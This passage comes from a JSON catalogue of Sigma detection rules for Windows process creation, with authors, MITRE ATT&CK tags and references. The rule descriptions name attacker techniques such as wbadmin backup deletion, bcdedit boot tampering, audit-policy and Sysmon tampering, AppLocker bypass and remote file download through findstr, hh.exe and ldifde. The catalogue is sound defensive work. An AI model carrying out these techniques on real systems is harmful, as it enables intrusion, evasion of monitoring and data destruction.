"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "value": "PUA - Potential PE Metadata Tamper Using Rcedit" }, { "description": "Detects calls to \"LoadAssemblyFromPath\" or \"LoadAssemblyFromNS\" that are part of the \"CL_LoadAssembly.ps1\" script. 
This can be abused to load different assemblies and bypass App locker controls.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_cl_loadassembly.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "value": "Assembly Loading Via CL_LoadAssembly.ps1" }, { "description": "Detects AdFind execution with common flags seen used during attacks", "meta": { "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "creation_date": "2021-02-02", "falsepositive": [ "Legitimate admin activity" ], "filename": "proc_creation_win_pua_adfind_susp_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects", "https://thedfirreport.com/2020/05/08/adfind-recon/", 
"https://www.joeware.net/freetools/tools/adfind/", "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml" ], "tags": [ "attack.discovery", "attack.t1018", "attack.t1087.002", "attack.t1482", "attack.t1069.002", "stp.1u" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", "value": "PUA - AdFind Suspicious Execution" }, { "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", "meta": { "author": "Cian Heasley", "creation_date": "2020-08-13", "falsepositive": [ "Legitimate uses of Mouse Lock software" ], "filename": "proc_creation_win_pua_mouselock_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", "https://sourceforge.net/projects/mouselock/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1056.002" ] }, "related": [ { "dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", "value": "PUA - Mouse Lock Execution" }, { "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". This can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", "meta": { "author": "@gott_cyber", "creation_date": "2022-09-02", "falsepositive": [ "Since the content of the files is unknown, false positives are expected" ], "filename": "proc_creation_win_ldifde_file_load.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], "tags": [ "attack.command-and-control", "attack.defense-evasion", "attack.t1218", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "value": "Import LDAP Data Interchange Format File Via Ldifde.EXE" }, { "description": "Detects the stopping of a Windows 
service via the \"net\" utility.", "meta": { "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-05", "falsepositive": [ "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], "filename": "proc_creation_win_net_stop_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/nt/net-service.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_stop_service.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88872991-7445-4a22-90b2-a3adadb0e827", "value": "Stop Windows Service Via Net.EXE" }, { "description": "Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading technique. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n", "meta": { "author": "Micah Babinski, @micahbabinski", "creation_date": "2023-05-07", "falsepositive": [ "Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use." 
], "filename": "proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.irongeek.com/homoglyph-attack-generator.php", "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32e280f1-8ad4-46ef-9e80-910657611fbc", "value": "Potential Homoglyph Attack Using Lookalike Characters" }, { "description": "Detects the deletion of backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-13", "falsepositive": [ "Legitimate backup activity from administration scripts and software." 
], "filename": "proc_creation_win_wbadmin_delete_backups.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", "https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-systemstatebackup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_delete_backups.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "value": "Windows Backup Deleted Via Wbadmin.EXE" }, { "description": "Detects suspicious encoded character syntax often used for defense evasion", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1281103918693482496", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", "value": "Potential PowerShell Obfuscation Via WCHAR" }, { "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2", "value": "Boot Configuration Tampering Via Bcdedit.EXE" }, { "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", "meta": { "author": "Florian Roth 
(Nextron Systems)", "creation_date": "2022-09-13", "falsepositive": [ "Some false positives may occur with other tools with similar commandlines" ], "filename": "proc_creation_win_pua_chisel.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/jpillora/chisel/", "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_chisel.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", "value": "PUA - Chisel Tunneling Tool Execution" }, { "description": "Detects usage of \"findstr\" with the argument \"385201\". 
Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", "meta": { "author": "frack113", "creation_date": "2021-12-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", "value": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE" }, { "description": "Detects execution of arbitrary DLLs or unsigned code via a \".csproj\" file passed to Dotnet.EXE.", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Legitimate administrator usage" ], "filename": "proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", "https://twitter.com/_felamos/status/1204705548668555264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": 
"457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "value": "Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE" }, { "description": "Detects execution of \"findstr\" with specific flags and a remote share path. This specific set of CLI flags would allow \"findstr\" to download the content of the file located on the remote share as described in the LOLBAS entry.\n", "meta": { "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1564.004", "attack.t1552.001", "attack.t1105" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"587254ee-a24b-4335-b3cd-065c0f1f4baa", "value": "Remote File Download Via Findstr.EXE" }, { "description": "The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence by modifying one of the Run or RunOnce registry keys, running a process or using other DLL chain calls (see references). The InstallHinfSection function in setupapi.dll calls the runonce.exe executable regardless of the actual content of the INF file.", "meta": { "author": "Konstantin Grishchenko, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", "value": "Suspicious Rundll32 Setupapi.dll Activity" }, { "description": "Detects a potential command line flag anomaly related to \"regsvr32\" in which the \"/i\" flag is used without the \"/n\" which should be uncommon.", "meta": { "author": "Florian Roth 
(Nextron Systems)", "creation_date": "2019-07-13", "falsepositive": [ "Administrator typo might cause some false positives" ], "filename": "proc_creation_win_regsvr32_flags_anomaly.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "value": "Potential Regsvr32 Commandline Flag Anomaly" }, { "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.001" ] }, "related": [ { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "value": "Remote CHM File Download/Execution Via 
HH.EXE" }, { "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wsl_child_processes_anomalies.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", "https://twitter.com/nas_bench/status/1535431474429808642", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2267fe65-0681-42ad-9a6d-46553d3f3480", "value": "WSL Child Process Anomaly" }, { "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", "meta": { "author": "Sreeman", "creation_date": "2020-09-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml" ], "tags": [ "attack.persistence", 
"attack.t1543.003", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", "value": "Potential Persistence Attempt Via Existing Service Tampering" }, { "description": "Detects the loading of malicious registered COM objects", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_rundll32_registered_com_objects.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", "value": "Rundll32 Registered COM Objects" }, { "description": "Detects the execution of a renamed ProcDump executable.\nThis is often done by attackers or malware in order to evade defensive mechanisms.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-11-18", "falsepositive": [ "Procdump illegally bundled with legitimate software.", "Administrators who rename binaries (should be investigated)." 
], "filename": "proc_creation_win_renamed_sysinternals_procdump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "value": "Renamed ProcDump Execution" }, { "description": "Detects the execution of \"hh.exe\" to open \".chm\" files.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "False positives are expected with legitimate \".CHM\"" ], "filename": "proc_creation_win_hh_chm_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.001" ] }, "related": [ { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "value": "HH.EXE Execution" }, { "description": "Detects updates to Sysmon's configuration. 
Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-09", "falsepositive": [ "Legitimate administrators might use this command to update Sysmon configuration." ], "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87911521-7098-470b-a459-9a57fc80bdfd", "value": "Sysmon Configuration Update" }, { "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-12-18", "falsepositive": [ "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. 
The FP rate should be very low except for tools that use a similar flag structure" ], "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "value": "Audit Policy Tampering Via NT Resource Kit Auditpol" }, { "description": "Detects the creation of a new service using the \"sc.exe\" utility.", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2023-02-20", "falsepositive": [ "Legitimate administrator or user creates a service for legitimate reasons.", "Software installation" ], "filename": "proc_creation_win_sc_create_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_create_service.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85ff530b-261d-48c6-a441-facaa2e81e48", "value": "New Service Creation Using Sc.EXE" }, { "description": "Detects cases in which an ISO file is opened within an 
archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-07", "falsepositive": [ "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "filename": "proc_creation_win_susp_archiver_iso_phishing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://twitter.com/1ZRR4H/status/1534259727059787783", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml" ], "tags": [ "attack.initial-access", "attack.t1566" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", "value": "Phishing Pattern ISO in Archive" }, { "description": "Detects suspicious use of PCHunter, a tool 